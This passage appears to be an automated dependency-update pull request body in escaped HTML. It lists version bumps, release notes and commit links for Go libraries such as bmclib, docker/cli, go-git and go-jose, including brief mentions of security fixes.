href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/412\"\u003ebmc-toolbox/bmclib#412\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved power state limitations from RPC provider by \u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCheck power state before issuing power off for ipmi: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/417\"\u003ebmc-toolbox/bmclib#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove sshclient package: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/420\"\u003ebmc-toolbox/bmclib#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mergify configuration issue: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/425\"\u003ebmc-toolbox/bmclib#425\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use all systems when no match is found: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/422\"\u003ebmc-toolbox/bmclib#422\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Redfish] Add support for UefiHttp boot by \u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eadd \u0026quot;homeassistant\u0026quot; provider by \u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(intelamt): implement Closer interface correctly by \u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdds BMC, BIOS firmware install support for Supermicro X11SSL-F by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/431\"\u003ebmc-toolbox/bmclib#431\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: fall back to System path for VirtualMedia discovery by \u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: make SetVirtualMedia fall back on failure by \u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow specifying the Redfish system name: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/400\"\u003ebmc-toolbox/bmclib#400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate redfish system name matching by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/401\"\u003ebmc-toolbox/bmclib#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eproviders/supermicro/supermicro.go: Initialize sum 'client' during serviceclient init by \u003ca href=\"https://github.com/splaspood\"\u003e\u003ccode\u003e@​splaspood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/402\"\u003ebmc-toolbox/bmclib#402\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate virtual media mounting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/398\"\u003ebmc-toolbox/bmclib#398\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eexpand response payload processing by \u003ca href=\"https://github.com/DoctorVin\"\u003e\u003ccode\u003e@​DoctorVin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/399\"\u003ebmc-toolbox/bmclib#399\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bmc-toolbox/bmclib/commits/v2.3.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/docker/cli` from 29.2.0+incompatible to 29.5.1+incompatible\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/2518b52d948a0cbee071d394c03c86a3005636ba\"\u003e\u003ccode\u003e2518b52\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6991\"\u003e#6991\u003c/a\u003e from mickael-docker/docs-clarify-authz\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/9f18a0a70c9228f5892594c6b56425b8bed1899f\"\u003e\u003ccode\u003e9f18a0a\u003c/code\u003e\u003c/a\u003e docs: clarify authz content type\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/2944fd1daa5d54315ab8fcd874ea9cb6199c6117\"\u003e\u003ccode\u003e2944fd1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6989\"\u003e#6989\u003c/a\u003e from thaJeztah/bump_version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/c41489ac3901885bb3891aef9cfe65ca69dc4580\"\u003e\u003ccode\u003ec41489a\u003c/code\u003e\u003c/a\u003e bump VERSION to v29.5.1-dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/98f14649600f05480629d5c481878b1e1bcb7c17\"\u003e\u003ccode\u003e98f1464\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6988\"\u003e#6988\u003c/a\u003e from thaJeztah/make_shell\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/50712c932660e7859d692b5aed45ad321beced1a\"\u003e\u003ccode\u003e50712c9\u003c/code\u003e\u003c/a\u003e README: simplify instructions for using dev container\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/653dc8f03d161677a8648758cdf0af8b150780bc\"\u003e\u003ccode\u003e653dc8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6485\"\u003e#6485\u003c/a\u003e from paulchen5/6484-update-pull-request-template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/13945822d4ba2119b867ee2cf215506c8b9f9817\"\u003e\u003ccode\u003e1394582\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6987\"\u003e#6987\u003c/a\u003e from thaJeztah/contributing_links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/f99747b9e0bee5623a13655439e7a34b696e8617\"\u003e\u003ccode\u003ef99747b\u003c/code\u003e\u003c/a\u003e docs: fix stale links in CONTRIBUTING.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/ddac061db783a24d75b24cabc74793f6924d4724\"\u003e\u003ccode\u003eddac061\u003c/code\u003e\u003c/a\u003e PR template: remove outdated contributing guide link\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/docker/cli/compare/v29.2.0...v29.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.17.1 to 5.19.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.19.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ev5: plumbing: transport/ssh, Shell-quote path by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2068\"\u003ego-git/go-git#2068\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: git: submodule, Fix relative URL resolution by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2070\"\u003ego-git/go-git#2070\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: git: submodule, canonical remote for relative URLs by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2074\"\u003ego-git/go-git#2074\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: git: submodule, error on remote without URLs by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2078\"\u003ego-git/go-git#2078\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: plumbing: format/idxfile, Validate offset64 indices by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2084\"\u003ego-git/go-git#2084\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: *: Reject malformed variable-length integers by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2092\"\u003ego-git/go-git#2092\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: plumbing: format/packfile, Tighten delta validation by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2091\"\u003ego-git/go-git#2091\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Add \u003ccode\u003eworktreeFilesystem\u003c/code\u003e wrapper for worktree and hardening by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2100\"\u003ego-git/go-git#2100\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: config: validate submodule names by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2082\"\u003ego-git/go-git#2082\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.19.0 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2111\"\u003ego-git/go-git#2111\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: git: Allow MkdirAll on worktree-root paths by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2117\"\u003ego-git/go-git#2117\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: git: Stop validating symlink target paths by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2116\"\u003ego-git/go-git#2116\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: plumbing: format decoder input bounds and contracts by \u003ca href=\"https://github.com/hiddeco\"\u003e\u003ccode\u003e@​hiddeco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2125\"\u003ego-git/go-git#2125\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eplumbing: format/packfile, cap delta chain depth in parser by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2137\"\u003ego-git/go-git#2137\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.19.0...v5.19.1\"\u003ehttps://github.com/go-git/go-git/compare/v5.19.0...v5.19.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.19.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.18.0 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2010\"\u003ego-git/go-git#2010\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Bump sha1cd and go-billy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2060\"\u003ego-git/go-git#2060\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Align object encoding with upstream by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2065\"\u003ego-git/go-git#2065\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.18.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eplumbing: transport/http, Add support for followRedirects policy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2004\"\u003ego-git/go-git#2004\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.17.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1941\"\u003ego-git/go-git#1941\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edotgit: skip writing pack files that already exist on disk by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1944\"\u003ego-git/go-git#1944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e:warning: This release fixes a bug (\u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1942\"\u003ego-git/go-git#1942\u003c/a\u003e) that blocked some users from upgrading to \u003ccode\u003ev5.17.1\u003c/code\u003e. Thanks \u003ca href=\"https://github.com/pskrbasu\"\u003e\u003ccode\u003e@​pskrbasu\u003c/code\u003e\u003c/a\u003e for reporting it. :bow:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/3c3be601aa6c0fd0d536c0d1e4f898b4c60e65fe\"\u003e\u003ccode\u003e3c3be60\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2137\"\u003e#2137\u003c/a\u003e from go-git/validate-v5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/3fba897bd9e84b1aec170fa708b80e297b7d6cf6\"\u003e\u003ccode\u003e3fba897\u003c/code\u003e\u003c/a\u003e plumbing: format/packfile, cap delta chain depth in parser\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/a97d6601c85e017bb64c2b0f2e3169f6ef6a6709\"\u003e\u003ccode\u003ea97d660\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2125\"\u003e#2125\u003c/a\u003e from hiddeco/v5/format-input-bounds\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/aeaa125c8af8e4c4c95b574c22c5633e97fc436e\"\u003e\u003ccode\u003eaeaa125\u003c/code\u003e\u003c/a\u003e plumbing: format/objfile, require Header before Read\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/1f38e171218526ea254a73187a52f0648253c1b8\"\u003e\u003ccode\u003e1f38e17\u003c/code\u003e\u003c/a\u003e plumbing: format/packfile, bound inflate size\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/f7545a02529e03998d6a7219140dc0e6644ad337\"\u003e\u003ccode\u003ef7545a0\u003c/code\u003e\u003c/a\u003e plumbing: format/idxfile, bound nr by file size\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/170b88181f385913a457a08b68c88956fb3f8e4f\"\u003e\u003ccode\u003e170b881\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2116\"\u003e#2116\u003c/a\u003e from pjbgf/symlink-v5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/7b6d994467f06630268904aa3c441b6de7248b31\"\u003e\u003ccode\u003e7b6d994\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2117\"\u003e#2117\u003c/a\u003e from hiddeco/v5/worktree-fs-mkdirall-root-noop\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/f0709b32f8fbb87c16cd63c6762d2cd515f36541\"\u003e\u003ccode\u003ef0709b3\u003c/code\u003e\u003c/a\u003e git: Stop validating symlink target paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/776d00f11d336f26862d0f2bab987b217f3a7844\"\u003e\u003ccode\u003e776d00f\u003c/code\u003e\u003c/a\u003e git: Allow MkdirAll on worktree-root paths\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.19.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-jose/go-jose/v3` from 3.0.4 to 3.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-jose/go-jose/releases\"\u003egithub.com/go-jose/go-jose/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.0.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\"\u003ehttps://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe recommend migrating from v3 to v4, and we will stop support v3 in the near future.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ehttps://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/be2f6548701d4ba561cd61c7d4a2f1289b66c273\"\u003e\u003ccode\u003ebe2f654\u003c/code\u003e\u003c/a\u003e ci: update Go versions for GHA workflows (\u003ca href=\"https://redirect.github.com/go-jose/go-jose/issues/221\"\u003e#221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/02464163e1e891db85257cb8860978a1c0226016\"\u003e\u003ccode\u003e0246416\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/nutanix-cloud-native/prism-go-client` from 0.3.4 to 0.7.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/releases\"\u003egithub.com/nutanix-cloud-native/prism-go-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: adding API calls for dataPolicy by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/340\"\u003enutanix-cloud-native/prism-go-client#340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/341\"\u003enutanix-cloud-native/prism-go-client#341\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adds the Nutanix Insights REST client by \u003ca 